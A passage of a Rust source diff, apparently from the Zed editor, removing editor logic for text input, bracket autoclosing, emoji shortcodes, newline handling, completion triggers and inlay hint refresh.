self.mode.is_full() && matches!(self.active_diagnostics, ActiveDiagnostic::Group(_)) { - self.dismiss_diagnostics(cx); - return true; - } - - false - } - - fn linked_editing_ranges_for( - &self, - selection: Range, - cx: &App, - ) -> Option, Vec>>> { - if self.linked_edit_ranges.is_empty() { - return None; - } - let ((base_range, linked_ranges), buffer_snapshot, buffer) = - selection.end.buffer_id.and_then(|end_buffer_id| { - if selection.start.buffer_id != Some(end_buffer_id) { - return None; - } - let buffer = self.buffer.read(cx).buffer(end_buffer_id)?; - let snapshot = buffer.read(cx).snapshot(); - self.linked_edit_ranges - .get(end_buffer_id, selection.start..selection.end, &snapshot) - .map(|ranges| (ranges, snapshot, buffer)) - })?; - use text::ToOffset as TO; - // find offset from the start of current range to current cursor position - let start_byte_offset = TO::to_offset(&base_range.start, &buffer_snapshot); - - let start_offset = TO::to_offset(&selection.start, &buffer_snapshot); - let start_difference = start_offset - start_byte_offset; - let end_offset = TO::to_offset(&selection.end, &buffer_snapshot); - let end_difference = end_offset - start_byte_offset; - // Current range has associated linked ranges. - let mut linked_edits = HashMap::<_, Vec<_>>::default(); - for range in linked_ranges.iter() { - let start_offset = TO::to_offset(&range.start, &buffer_snapshot); - let end_offset = start_offset + end_difference; - let start_offset = start_offset + start_difference; - if start_offset > buffer_snapshot.len() || end_offset > buffer_snapshot.len() { - continue; - } - if self.selections.disjoint_anchor_ranges().any(|s| { - if s.start.buffer_id != selection.start.buffer_id - || s.end.buffer_id != selection.end.buffer_id - { - return false; - } - TO::to_offset(&s.start.text_anchor, &buffer_snapshot) <= end_offset - && TO::to_offset(&s.end.text_anchor, &buffer_snapshot) >= start_offset - }) { - continue; - } - let start = buffer_snapshot.anchor_after(start_offset); - let end = buffer_snapshot.anchor_after(end_offset); - linked_edits - .entry(buffer.clone()) - .or_default() - .push(start..end); - } - Some(linked_edits) - } - - pub fn handle_input(&mut self, text: &str, window: &mut Window, cx: &mut Context) { - let text: Arc = text.into(); - - if self.read_only(cx) { - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let selections = self.selections.all_adjusted(cx); - let mut bracket_inserted = false; - let mut edits = Vec::new(); - let mut linked_edits = HashMap::<_, Vec<_>>::default(); - let mut new_selections = Vec::with_capacity(selections.len()); - let mut new_autoclose_regions = Vec::new(); - let snapshot = self.buffer.read(cx).read(cx); - let mut clear_linked_edit_ranges = false; - - for (selection, autoclose_region) in - self.selections_with_autoclose_regions(selections, &snapshot) - { - if let Some(scope) = snapshot.language_scope_at(selection.head()) { - // Determine if the inserted text matches the opening or closing - // bracket of any of this language's bracket pairs. - let mut bracket_pair = None; - let mut is_bracket_pair_start = false; - let mut is_bracket_pair_end = false; - if !text.is_empty() { - let mut bracket_pair_matching_end = None; - // `text` can be empty when a user is using IME (e.g. Chinese Wubi Simplified) - // and they are removing the character that triggered IME popup. - for (pair, enabled) in scope.brackets() { - if !pair.close && !pair.surround { - continue; - } - - if enabled && pair.start.ends_with(text.as_ref()) { - let prefix_len = pair.start.len() - text.len(); - let preceding_text_matches_prefix = prefix_len == 0 - || (selection.start.column >= (prefix_len as u32) - && snapshot.contains_str_at( - Point::new( - selection.start.row, - selection.start.column - (prefix_len as u32), - ), - &pair.start[..prefix_len], - )); - if preceding_text_matches_prefix { - bracket_pair = Some(pair.clone()); - is_bracket_pair_start = true; - break; - } - } - if pair.end.as_str() == text.as_ref() && bracket_pair_matching_end.is_none() - { - // take first bracket pair matching end, but don't break in case a later bracket - // pair matches start - bracket_pair_matching_end = Some(pair.clone()); - } - } - if bracket_pair.is_none() && bracket_pair_matching_end.is_some() { - bracket_pair = Some(bracket_pair_matching_end.unwrap()); - is_bracket_pair_end = true; - } - } - - if let Some(bracket_pair) = bracket_pair { - let snapshot_settings = snapshot.language_settings_at(selection.start, cx); - let autoclose = self.use_autoclose && snapshot_settings.use_autoclose; - let auto_surround = - self.use_auto_surround && snapshot_settings.use_auto_surround; - if selection.is_empty() { - if is_bracket_pair_start { - // If the inserted text is a suffix of an opening bracket and the - // selection is preceded by the rest of the opening bracket, then - // insert the closing bracket. - let following_text_allows_autoclose = snapshot - .chars_at(selection.start) - .next() - .map_or(true, |c| scope.should_autoclose_before(c)); - - let preceding_text_allows_autoclose = selection.start.column == 0 - || snapshot.reversed_chars_at(selection.start).next().map_or( - true, - |c| { - bracket_pair.start != bracket_pair.end - || !snapshot - .char_classifier_at(selection.start) - .is_word(c) - }, - ); - - let is_closing_quote = if bracket_pair.end == bracket_pair.start - && bracket_pair.start.len() == 1 - { - let target = bracket_pair.start.chars().next().unwrap(); - let current_line_count = snapshot - .reversed_chars_at(selection.start) - .take_while(|&c| c != '\n') - .filter(|&c| c == target) - .count(); - current_line_count % 2 == 1 - } else { - false - }; - - if autoclose - && bracket_pair.close - && following_text_allows_autoclose - && preceding_text_allows_autoclose - && !is_closing_quote - { - let anchor = snapshot.anchor_before(selection.end); - new_selections.push((selection.map(|_| anchor), text.len())); - new_autoclose_regions.push(( - anchor, - text.len(), - selection.id, - bracket_pair.clone(), - )); - edits.push(( - selection.range(), - format!("{}{}", text, bracket_pair.end).into(), - )); - bracket_inserted = true; - continue; - } - } - - if let Some(region) = autoclose_region { - // If the selection is followed by an auto-inserted closing bracket, - // then don't insert that closing bracket again; just move the selection - // past the closing bracket. - let should_skip = selection.end == region.range.end.to_point(&snapshot) - && text.as_ref() == region.pair.end.as_str(); - if should_skip { - let anchor = snapshot.anchor_after(selection.end); - new_selections - .push((selection.map(|_| anchor), region.pair.end.len())); - continue; - } - } - - let always_treat_brackets_as_autoclosed = snapshot - .language_settings_at(selection.start, cx) - .always_treat_brackets_as_autoclosed; - if always_treat_brackets_as_autoclosed - && is_bracket_pair_end - && snapshot.contains_str_at(selection.end, text.as_ref()) - { - // Otherwise, when `always_treat_brackets_as_autoclosed` is set to `true - // and the inserted text is a closing bracket and the selection is followed - // by the closing bracket then move the selection past the closing bracket. - let anchor = snapshot.anchor_after(selection.end); - new_selections.push((selection.map(|_| anchor), text.len())); - continue; - } - } - // If an opening bracket is 1 character long and is typed while - // text is selected, then surround that text with the bracket pair. - else if auto_surround - && bracket_pair.surround - && is_bracket_pair_start - && bracket_pair.start.chars().count() == 1 - { - edits.push((selection.start..selection.start, text.clone())); - edits.push(( - selection.end..selection.end, - bracket_pair.end.as_str().into(), - )); - bracket_inserted = true; - new_selections.push(( - Selection { - id: selection.id, - start: snapshot.anchor_after(selection.start), - end: snapshot.anchor_before(selection.end), - reversed: selection.reversed, - goal: selection.goal, - }, - 0, - )); - continue; - } - } - } - - if self.auto_replace_emoji_shortcode - && selection.is_empty() - && text.as_ref().ends_with(':') - { - if let Some(possible_emoji_short_code) = - Self::find_possible_emoji_shortcode_at_position(&snapshot, selection.start) - { - if !possible_emoji_short_code.is_empty() { - if let Some(emoji) = emojis::get_by_shortcode(&possible_emoji_short_code) { - let emoji_shortcode_start = Point::new( - selection.start.row, - selection.start.column - possible_emoji_short_code.len() as u32 - 1, - ); - - // Remove shortcode from buffer - edits.push(( - emoji_shortcode_start..selection.start, - "".to_string().into(), - )); - new_selections.push(( - Selection { - id: selection.id, - start: snapshot.anchor_after(emoji_shortcode_start), - end: snapshot.anchor_before(selection.start), - reversed: selection.reversed, - goal: selection.goal, - }, - 0, - )); - - // Insert emoji - let selection_start_anchor = snapshot.anchor_after(selection.start); - new_selections.push((selection.map(|_| selection_start_anchor), 0)); - edits.push((selection.start..selection.end, emoji.to_string().into())); - - continue; - } - } - } - } - - // If not handling any auto-close operation, then just replace the selected - // text with the given input and move the selection to the end of the - // newly inserted text. - let anchor = snapshot.anchor_after(selection.end); - if !self.linked_edit_ranges.is_empty() { - let start_anchor = snapshot.anchor_before(selection.start); - - let is_word_char = text.chars().next().map_or(true, |char| { - let classifier = snapshot.char_classifier_at(start_anchor.to_offset(&snapshot)); - classifier.is_word(char) - }); - - if is_word_char { - if let Some(ranges) = self - .linked_editing_ranges_for(start_anchor.text_anchor..anchor.text_anchor, cx) - { - for (buffer, edits) in ranges { - linked_edits - .entry(buffer.clone()) - .or_default() - .extend(edits.into_iter().map(|range| (range, text.clone()))); - } - } - } else { - clear_linked_edit_ranges = true; - } - } - - new_selections.push((selection.map(|_| anchor), 0)); - edits.push((selection.start..selection.end, text.clone())); - } - - drop(snapshot); - - self.transact(window, cx, |this, window, cx| { - if clear_linked_edit_ranges { - this.linked_edit_ranges.clear(); - } - let initial_buffer_versions = - jsx_tag_auto_close::construct_initial_buffer_versions_map(this, &edits, cx); - - this.buffer.update(cx, |buffer, cx| { - buffer.edit(edits, this.autoindent_mode.clone(), cx); - }); - for (buffer, edits) in linked_edits { - buffer.update(cx, |buffer, cx| { - let snapshot = buffer.snapshot(); - let edits = edits - .into_iter() - .map(|(range, text)| { - use text::ToPoint as TP; - let end_point = TP::to_point(&range.end, &snapshot); - let start_point = TP::to_point(&range.start, &snapshot); - (start_point..end_point, text) - }) - .sorted_by_key(|(range, _)| range.start); - buffer.edit(edits, None, cx); - }) - } - let new_anchor_selections = new_selections.iter().map(|e| &e.0); - let new_selection_deltas = new_selections.iter().map(|e| e.1); - let map = this.display_map.update(cx, |map, cx| map.snapshot(cx)); - let new_selections = resolve_selections::(new_anchor_selections, &map) - .zip(new_selection_deltas) - .map(|(selection, delta)| Selection { - id: selection.id, - start: selection.start + delta, - end: selection.end + delta, - reversed: selection.reversed, - goal: SelectionGoal::None, - }) - .collect::>(); - - let mut i = 0; - for (position, delta, selection_id, pair) in new_autoclose_regions { - let position = position.to_offset(&map.buffer_snapshot) + delta; - let start = map.buffer_snapshot.anchor_before(position); - let end = map.buffer_snapshot.anchor_after(position); - while let Some(existing_state) = this.autoclose_regions.get(i) { - match existing_state.range.start.cmp(&start, &map.buffer_snapshot) { - Ordering::Less => i += 1, - Ordering::Greater => break, - Ordering::Equal => { - match end.cmp(&existing_state.range.end, &map.buffer_snapshot) { - Ordering::Less => i += 1, - Ordering::Equal => break, - Ordering::Greater => break, - } - } - } - } - this.autoclose_regions.insert( - i, - AutocloseRegion { - selection_id, - range: start..end, - pair, - }, - ); - } - - let had_active_inline_completion = this.has_active_inline_completion(); - this.change_selections_inner(Some(Autoscroll::fit()), false, window, cx, |s| { - s.select(new_selections) - }); - - if !bracket_inserted { - if let Some(on_type_format_task) = - this.trigger_on_type_formatting(text.to_string(), window, cx) - { - on_type_format_task.detach_and_log_err(cx); - } - } - - let editor_settings = EditorSettings::get_global(cx); - if bracket_inserted - && (editor_settings.auto_signature_help - || editor_settings.show_signature_help_after_edits) - { - this.show_signature_help(&ShowSignatureHelp, window, cx); - } - - let trigger_in_words = - this.show_edit_predictions_in_menu() || !had_active_inline_completion; - if this.hard_wrap.is_some() { - let latest: Range = this.selections.newest(cx).range(); - if latest.is_empty() - && this - .buffer() - .read(cx) - .snapshot(cx) - .line_len(MultiBufferRow(latest.start.row)) - == latest.start.column - { - this.rewrap_impl( - RewrapOptions { - override_language_settings: true, - preserve_existing_whitespace: true, - }, - cx, - ) - } - } - this.trigger_completion_on_input(&text, trigger_in_words, window, cx); - linked_editing_ranges::refresh_linked_ranges(this, window, cx); - this.refresh_inline_completion(true, false, window, cx); - jsx_tag_auto_close::handle_from(this, initial_buffer_versions, window, cx); - }); - } - - fn find_possible_emoji_shortcode_at_position( - snapshot: &MultiBufferSnapshot, - position: Point, - ) -> Option { - let mut chars = Vec::new(); - let mut found_colon = false; - for char in snapshot.reversed_chars_at(position).take(100) { - // Found a possible emoji shortcode in the middle of the buffer - if found_colon { - if char.is_whitespace() { - chars.reverse(); - return Some(chars.iter().collect()); - } - // If the previous character is not a whitespace, we are in the middle of a word - // and we only want to complete the shortcode if the word is made up of other emojis - let mut containing_word = String::new(); - for ch in snapshot - .reversed_chars_at(position) - .skip(chars.len() + 1) - .take(100) - { - if ch.is_whitespace() { - break; - } - containing_word.push(ch); - } - let containing_word = containing_word.chars().rev().collect::(); - if util::word_consists_of_emojis(containing_word.as_str()) { - chars.reverse(); - return Some(chars.iter().collect()); - } - } - - if char.is_whitespace() || !char.is_ascii() { - return None; - } - if char == ':' { - found_colon = true; - } else { - chars.push(char); - } - } - // Found a possible emoji shortcode at the beginning of the buffer - chars.reverse(); - Some(chars.iter().collect()) - } - - pub fn newline(&mut self, _: &Newline, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - let (edits, selection_fixup_info): (Vec<_>, Vec<_>) = { - let selections = this.selections.all::(cx); - let multi_buffer = this.buffer.read(cx); - let buffer = multi_buffer.snapshot(cx); - selections - .iter() - .map(|selection| { - let start_point = selection.start.to_point(&buffer); - let mut indent = - buffer.indent_size_for_line(MultiBufferRow(start_point.row)); - indent.len = cmp::min(indent.len, start_point.column); - let start = selection.start; - let end = selection.end; - let selection_is_empty = start == end; - let language_scope = buffer.language_scope_at(start); - let (comment_delimiter, insert_extra_newline) = if let Some(language) = - &language_scope - { - let insert_extra_newline = - insert_extra_newline_brackets(&buffer, start..end, language) - || insert_extra_newline_tree_sitter(&buffer, start..end); - - // Comment extension on newline is allowed only for cursor selections - let comment_delimiter = maybe!({ - if !selection_is_empty { - return None; - } - - if !multi_buffer.language_settings(cx).extend_comment_on_newline { - return None; - } - - let delimiters = language.line_comment_prefixes(); - let max_len_of_delimiter = - delimiters.iter().map(|delimiter| delimiter.len()).max()?; - let (snapshot, range) = - buffer.buffer_line_for_row(MultiBufferRow(start_point.row))?; - - let mut index_of_first_non_whitespace = 0; - let comment_candidate = snapshot - .chars_for_range(range) - .skip_while(|c| { - let should_skip = c.is_whitespace(); - if should_skip { - index_of_first_non_whitespace += 1; - } - should_skip - }) - .take(max_len_of_delimiter) - .collect::(); - let comment_prefix = delimiters.iter().find(|comment_prefix| { - comment_candidate.starts_with(comment_prefix.as_ref()) - })?; - let cursor_is_placed_after_comment_marker = - index_of_first_non_whitespace + comment_prefix.len() - <= start_point.column as usize; - if cursor_is_placed_after_comment_marker { - Some(comment_prefix.clone()) - } else { - None - } - }); - (comment_delimiter, insert_extra_newline) - } else { - (None, false) - }; - - let capacity_for_delimiter = comment_delimiter - .as_deref() - .map(str::len) - .unwrap_or_default(); - let mut new_text = - String::with_capacity(1 + capacity_for_delimiter + indent.len as usize); - new_text.push('\n'); - new_text.extend(indent.chars()); - if let Some(delimiter) = &comment_delimiter { - new_text.push_str(delimiter); - } - if insert_extra_newline { - new_text = new_text.repeat(2); - } - - let anchor = buffer.anchor_after(end); - let new_selection = selection.map(|_| anchor); - ( - (start..end, new_text), - (insert_extra_newline, new_selection), - ) - }) - .unzip() - }; - - this.edit_with_autoindent(edits, cx); - let buffer = this.buffer.read(cx).snapshot(cx); - let new_selections = selection_fixup_info - .into_iter() - .map(|(extra_newline_inserted, new_selection)| { - let mut cursor = new_selection.end.to_point(&buffer); - if extra_newline_inserted { - cursor.row -= 1; - cursor.column = buffer.line_len(MultiBufferRow(cursor.row)); - } - new_selection.map(|_| cursor) - }) - .collect(); - - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(new_selections) - }); - this.refresh_inline_completion(true, false, window, cx); - }); - } - - pub fn newline_above(&mut self, _: &NewlineAbove, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let buffer = self.buffer.read(cx); - let snapshot = buffer.snapshot(cx); - - let mut edits = Vec::new(); - let mut rows = Vec::new(); - - for (rows_inserted, selection) in self.selections.all_adjusted(cx).into_iter().enumerate() { - let cursor = selection.head(); - let row = cursor.row; - - let start_of_line = snapshot.clip_point(Point::new(row, 0), Bias::Left); - - let newline = "\n".to_string(); - edits.push((start_of_line..start_of_line, newline)); - - rows.push(row + rows_inserted as u32); - } - - self.transact(window, cx, |editor, window, cx| { - editor.edit(edits, cx); - - editor.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - let mut index = 0; - s.move_cursors_with(|map, _, _| { - let row = rows[index]; - index += 1; - - let point = Point::new(row, 0); - let boundary = map.next_line_boundary(point).1; - let clipped = map.clip_point(boundary, Bias::Left); - - (clipped, SelectionGoal::None) - }); - }); - - let mut indent_edits = Vec::new(); - let multibuffer_snapshot = editor.buffer.read(cx).snapshot(cx); - for row in rows { - let indents = multibuffer_snapshot.suggested_indents(row..row + 1, cx); - for (row, indent) in indents { - if indent.len == 0 { - continue; - } - - let text = match indent.kind { - IndentKind::Space => " ".repeat(indent.len as usize), - IndentKind::Tab => "\t".repeat(indent.len as usize), - }; - let point = Point::new(row.0, 0); - indent_edits.push((point..point, text)); - } - } - editor.edit(indent_edits, cx); - }); - } - - pub fn newline_below(&mut self, _: &NewlineBelow, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let buffer = self.buffer.read(cx); - let snapshot = buffer.snapshot(cx); - - let mut edits = Vec::new(); - let mut rows = Vec::new(); - let mut rows_inserted = 0; - - for selection in self.selections.all_adjusted(cx) { - let cursor = selection.head(); - let row = cursor.row; - - let point = Point::new(row + 1, 0); - let start_of_line = snapshot.clip_point(point, Bias::Left); - - let newline = "\n".to_string(); - edits.push((start_of_line..start_of_line, newline)); - - rows_inserted += 1; - rows.push(row + rows_inserted); - } - - self.transact(window, cx, |editor, window, cx| { - editor.edit(edits, cx); - - editor.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - let mut index = 0; - s.move_cursors_with(|map, _, _| { - let row = rows[index]; - index += 1; - - let point = Point::new(row, 0); - let boundary = map.next_line_boundary(point).1; - let clipped = map.clip_point(boundary, Bias::Left); - - (clipped, SelectionGoal::None) - }); - }); - - let mut indent_edits = Vec::new(); - let multibuffer_snapshot = editor.buffer.read(cx).snapshot(cx); - for row in rows { - let indents = multibuffer_snapshot.suggested_indents(row..row + 1, cx); - for (row, indent) in indents { - if indent.len == 0 { - continue; - } - - let text = match indent.kind { - IndentKind::Space => " ".repeat(indent.len as usize), - IndentKind::Tab => "\t".repeat(indent.len as usize), - }; - let point = Point::new(row.0, 0); - indent_edits.push((point..point, text)); - } - } - editor.edit(indent_edits, cx); - }); - } - - pub fn insert(&mut self, text: &str, window: &mut Window, cx: &mut Context) { - let autoindent = text.is_empty().not().then(|| AutoindentMode::Block { - original_indent_columns: Vec::new(), - }); - self.insert_with_autoindent_mode(text, autoindent, window, cx); - } - - fn insert_with_autoindent_mode( - &mut self, - text: &str, - autoindent_mode: Option, - window: &mut Window, - cx: &mut Context, - ) { - if self.read_only(cx) { - return; - } - - let text: Arc = text.into(); - self.transact(window, cx, |this, window, cx| { - let old_selections = this.selections.all_adjusted(cx); - let selection_anchors = this.buffer.update(cx, |buffer, cx| { - let anchors = { - let snapshot = buffer.read(cx); - old_selections - .iter() - .map(|s| { - let anchor = snapshot.anchor_after(s.head()); - s.map(|_| anchor) - }) - .collect::>() - }; - buffer.edit( - old_selections - .iter() - .map(|s| (s.start..s.end, text.clone())), - autoindent_mode, - cx, - ); - anchors - }); - - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_anchors(selection_anchors); - }); - - cx.notify(); - }); - } - - fn trigger_completion_on_input( - &mut self, - text: &str, - trigger_in_words: bool, - window: &mut Window, - cx: &mut Context, - ) { - let ignore_completion_provider = self - .context_menu - .borrow() - .as_ref() - .map(|menu| match menu { - CodeContextMenu::Completions(completions_menu) => { - completions_menu.ignore_completion_provider - } - CodeContextMenu::CodeActions(_) => false, - }) - .unwrap_or(false); - - if ignore_completion_provider { - self.show_word_completions(&ShowWordCompletions, window, cx); - } else if self.is_completion_trigger(text, trigger_in_words, cx) { - self.show_completions( - &ShowCompletions { - trigger: Some(text.to_owned()).filter(|x| !x.is_empty()), - }, - window, - cx, - ); - } else { - self.hide_context_menu(window, cx); - } - } - - fn is_completion_trigger( - &self, - text: &str, - trigger_in_words: bool, - cx: &mut Context, - ) -> bool { - let position = self.selections.newest_anchor().head(); - let multibuffer = self.buffer.read(cx); - let Some(buffer) = position - .buffer_id - .and_then(|buffer_id| multibuffer.buffer(buffer_id).clone()) - else { - return false; - }; - - if let Some(completion_provider) = &self.completion_provider { - completion_provider.is_completion_trigger( - &buffer, - position.text_anchor, - text, - trigger_in_words, - cx, - ) - } else { - false - } - } - - /// If any empty selections is touching the start of its innermost containing autoclose - /// region, expand it to select the brackets. - fn select_autoclose_pair(&mut self, window: &mut Window, cx: &mut Context) { - let selections = self.selections.all::(cx); - let buffer = self.buffer.read(cx).read(cx); - let new_selections = self - .selections_with_autoclose_regions(selections, &buffer) - .map(|(mut selection, region)| { - if !selection.is_empty() { - return selection; - } - - if let Some(region) = region { - let mut range = region.range.to_offset(&buffer); - if selection.start == range.start && range.start >= region.pair.start.len() { - range.start -= region.pair.start.len(); - if buffer.contains_str_at(range.start, ®ion.pair.start) - && buffer.contains_str_at(range.end, ®ion.pair.end) - { - range.end += region.pair.end.len(); - selection.start = range.start; - selection.end = range.end; - - return selection; - } - } - } - - let always_treat_brackets_as_autoclosed = buffer - .language_settings_at(selection.start, cx) - .always_treat_brackets_as_autoclosed; - - if !always_treat_brackets_as_autoclosed { - return selection; - } - - if let Some(scope) = buffer.language_scope_at(selection.start) { - for (pair, enabled) in scope.brackets() { - if !enabled || !pair.close { - continue; - } - - if buffer.contains_str_at(selection.start, &pair.end) { - let pair_start_len = pair.start.len(); - if buffer.contains_str_at( - selection.start.saturating_sub(pair_start_len), - &pair.start, - ) { - selection.start -= pair_start_len; - selection.end += pair.end.len(); - - return selection; - } - } - } - } - - selection - }) - .collect(); - - drop(buffer); - self.change_selections(None, window, cx, |selections| { - selections.select(new_selections) - }); - } - - /// Iterate the given selections, and for each one, find the smallest surrounding - /// autoclose region. This uses the ordering of the selections and the autoclose - /// regions to avoid repeated comparisons. - fn selections_with_autoclose_regions<'a, D: ToOffset + Clone>( - &'a self, - selections: impl IntoIterator>, - buffer: &'a MultiBufferSnapshot, - ) -> impl Iterator, Option<&'a AutocloseRegion>)> { - let mut i = 0; - let mut regions = self.autoclose_regions.as_slice(); - selections.into_iter().map(move |selection| { - let range = selection.start.to_offset(buffer)..selection.end.to_offset(buffer); - - let mut enclosing = None; - while let Some(pair_state) = regions.get(i) { - if pair_state.range.end.to_offset(buffer) < range.start { - regions = ®ions[i + 1..]; - i = 0; - } else if pair_state.range.start.to_offset(buffer) > range.end { - break; - } else { - if pair_state.selection_id == selection.id { - enclosing = Some(pair_state); - } - i += 1; - } - } - - (selection, enclosing) - }) - } - - /// Remove any autoclose regions that no longer contain their selection. - fn invalidate_autoclose_regions( - &mut self, - mut selections: &[Selection], - buffer: &MultiBufferSnapshot, - ) { - self.autoclose_regions.retain(|state| { - let mut i = 0; - while let Some(selection) = selections.get(i) { - if selection.end.cmp(&state.range.start, buffer).is_lt() { - selections = &selections[1..]; - continue; - } - if selection.start.cmp(&state.range.end, buffer).is_gt() { - break; - } - if selection.id == state.selection_id { - return true; - } else { - i += 1; - } - } - false - }); - } - - fn completion_query(buffer: &MultiBufferSnapshot, position: impl ToOffset) -> Option { - let offset = position.to_offset(buffer); - let (word_range, kind) = buffer.surrounding_word(offset, true); - if offset > word_range.start && kind == Some(CharKind::Word) { - Some( - buffer - .text_for_range(word_range.start..offset) - .collect::(), - ) - } else { - None - } - } - - pub fn toggle_inline_values( - &mut self, - _: &ToggleInlineValues, - _: &mut Window, - cx: &mut Context, - ) { - self.inline_value_cache.enabled = !self.inline_value_cache.enabled; - - self.refresh_inline_values(cx); - } - - pub fn toggle_inlay_hints( - &mut self, - _: &ToggleInlayHints, - _: &mut Window, - cx: &mut Context, - ) { - self.refresh_inlay_hints( - InlayHintRefreshReason::Toggle(!self.inlay_hints_enabled()), - cx, - ); - } - - pub fn inlay_hints_enabled(&self) -> bool { - self.inlay_hint_cache.enabled - } - - pub fn inline_values_enabled(&self) -> bool { - self.inline_value_cache.enabled - } - - fn refresh_inlay_hints(&mut self, reason: InlayHintRefreshReason, cx: &mut Context) { - if self.semantics_provider.is_none() || !self.mode.is_full() { - return; - } - - let reason_description = reason.description(); - let ignore_debounce = matches!( - reason, - InlayHintRefreshReason::SettingsChange(_) - | InlayHintRefreshReason::Toggle(_) - | InlayHintRefreshReason::ExcerptsRemoved(_) - | InlayHintRefreshReason::ModifiersChanged(_) - ); - let (invalidate_cache, required_languages) = match reason { - InlayHintRefreshReason::ModifiersChanged(enabled) => { - match self.inlay_hint_cache.modifiers_override(enabled) { - Some(enabled) => { - if enabled { - (InvalidationStrategy::RefreshRequested, None) - } else { - self.splice_inlays( - &self - .visible_inlay_hints(cx) - .iter() - .map(|inlay| inlay.id) - .collect::>(), - Vec::new(), - cx, - ); - return; - } - } - None => return, - } - } - InlayHintRefreshReason::Toggle(enabled) => { - if self.inlay_hint_cache.toggle(enabled) { - if enabled { - (InvalidationStrategy::RefreshRequested, None) - } else { - self.splice_inlays( - &self - .visible_inlay_hints(cx) - .iter() - .map(|inlay| inlay.id) - .collect::>(), - Vec::new(), - cx, - ); - return; - } - } else { - return; - } - } - InlayHintRefreshReason::SettingsChange(new_settings) => { - match self.inlay_hint_cache.update_settings( - &self.buffer, - new_settings, - self.visible_inlay_hints(cx), - cx, - ) { - ControlFlow::Break(Some(InlaySplice { - to_remove, - to_insert, - })) => { - self.splice_inlays(&to_remove, to_insert, cx); - return; - } - ControlFlow::Break(None) => return, - ControlFlow::Continue(()) => (InvalidationStrategy::RefreshRequested, None), - } - } - InlayHintRefreshReason::ExcerptsRemoved(excerpts_removed) => { - if let Some(InlaySplice { - to_remove, - to_insert, - }) = self.inlay_hint_cache.remove_excerpts(&excerpts_removed) - { - self.splice_inlays(&to_remove, to_insert, cx); - } - self.display_map.update(cx, |display_map, _| { - display_map.remove_inlays_for_excerpts(&excerpts_removed) - }); - return; - } - InlayHintRefreshReason::NewLinesShown => (InvalidationStrategy::None, None), - InlayHintRefreshReason::BufferEdited(buffer_languages) => { - (InvalidationStrategy::BufferEdited, Some(buffer_languages)) - } - InlayHintRefreshReason::RefreshRequested => { - (InvalidationStrategy::RefreshRequested, None) - } - }; - - if let Some(InlaySplice { - to_remove, - to_insert, - }) = self.inlay_hint_cache.spawn_hint_refresh( - reason_description, - self.excerpts_for_inlay_hints_query(required_languages.as_ref(), cx), - invalidate_cache, - ignore_debounce, - cx, - ) { - self.splice_inlays(&to_remove, to_insert, cx); - } - } - - fn visible_inlay_hints(&self, cx: &Context) -> Vec { - self.display_map - .read(cx) - .current_inlays() - .filter(move |inlay| matches!(inlay.id, InlayId::Hint(_))) - .cloned() - .collect() - } - - pub fn excerpts_for_inlay_hints_query( - &self, - restrict_to_languages: Option<&HashSet>>, - cx: &mut Context, - ) -> HashMap, clock::Global, Range)> { - let Some(project) = self.project.as_ref() else { - return HashMap::default(); - }; - let project = project.read(cx); - let multi_buffer = self.buffer().read(cx); - let multi_buffer_snapshot = multi_buffer.snapshot(cx); - let multi_buffer_visible_start = self - .scroll_manager - .anchor() - .anchor - .to_point(&multi_buffer_snapshot); - let multi_buffer_visible_end = multi_buffer_snapshot.clip_point( - multi_buffer_visible_start - + Point::new(self.visible_line_count().unwrap_or(0.).ceil() as u32, 0), - Bias::Left, - ); - let multi_buffer_visible_range = multi_buffer_visible_start..multi_buffer_visible_end; - multi_buffer_snapshot - .range_to_buffer_ranges(multi_buffer_visible_range) - .into_iter() - .filter(|(_, excerpt_visible_range, _)| !excerpt_visible_range.is_empty()) - .filter_map(|(buffer, excerpt_visible_range, excerpt_id)| { - let buffer_file = project::File::from_dyn(buffer.file())?; - let buffer_worktree = project.worktree_for_id(buffer_file.worktree_id(cx), cx)?; - let worktree_entry = buffer_worktree - .read(cx) - .entry_for_id(buffer_file.project_entry_id(cx)?)?; - if worktree_entry.is_ignored { - return None; - } - - let language = buffer.language()?; - if let Some(restrict_to_languages) = restrict_to_languages { - if !restrict_to_languages.contains(language) { - return None; - } - } - Some(( - excerpt_id, - ( - multi_buffer.buffer(buffer.remote_id()).unwrap(), - buffer.version().clone(), - excerpt_visible_range, - ), - )) - }) - .collect() - } - - pub fn text_layout_details(&self, window: &mut Window) -> TextLayoutDetails { - TextLayoutDetails { - text_system: window.text_system().clone(), - editor_style: self.style.clone().unwrap(), - rem_size: window.rem_size(), - scroll_anchor: self.scroll_manager.anchor(), - visible_rows: self.visible_line_count(), - vertical_scroll_margin: self.scroll_manager.vertical_scroll_margin, - } - } - - pub fn splice_inlays( - &self, - to_remove: &[InlayId], - to_insert: Vec, - cx: &mut Context, - ) { - self.display_map.update(cx, |display_map, cx| { - display_map.splice_inlays(to_remove, to_insert, cx) - }); - cx.notify(); - } - - fn trigger_on_type_formatting( - &self, - input: String, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - if input.len() != 1 { - return None; - } - - let project = self.project.as_ref()?; - let position = self.selections.newest_anchor().head(); - let (buffer, buffer_position) = self - .buffer - .read(cx) - .text_anchor_for_position(position, cx)?; - - let settings = language_settings::language_settings( - buffer - .read(cx) - .language_at(buffer_position) - .map(|l| l.name()), - buffer.read(cx).file(), - cx, - ); - if !settings.use_on_type_format { - return None; - } - - // OnTypeFormatting returns a list of edits, no need to pass them between Zed instances, - // hence we do LSP request & edit on host side only — add formats to host's history. - let push_to_lsp_host_history = true; - // If this is not the host, append its history with new edits. - let push_to_client_history = project.read(cx).is_via_collab(); - - let on_type_formatting = project.update(cx, |project, cx| { - project.on_type_format( - buffer.clone(), - buffer_position, - input, - push_to_lsp_host_history, - cx, - ) - }); - Some(cx.spawn_in(window, async move |editor, cx| { - if let Some(transaction) = on_type_formatting.await? { - if push_to_client_history { - buffer - .update(cx, |buffer, _| { - buffer.push_transaction(transaction, Instant::now()); - buffer.finalize_last_transaction(); - }) - .ok(); - } - editor.update(cx, |editor, cx| { - 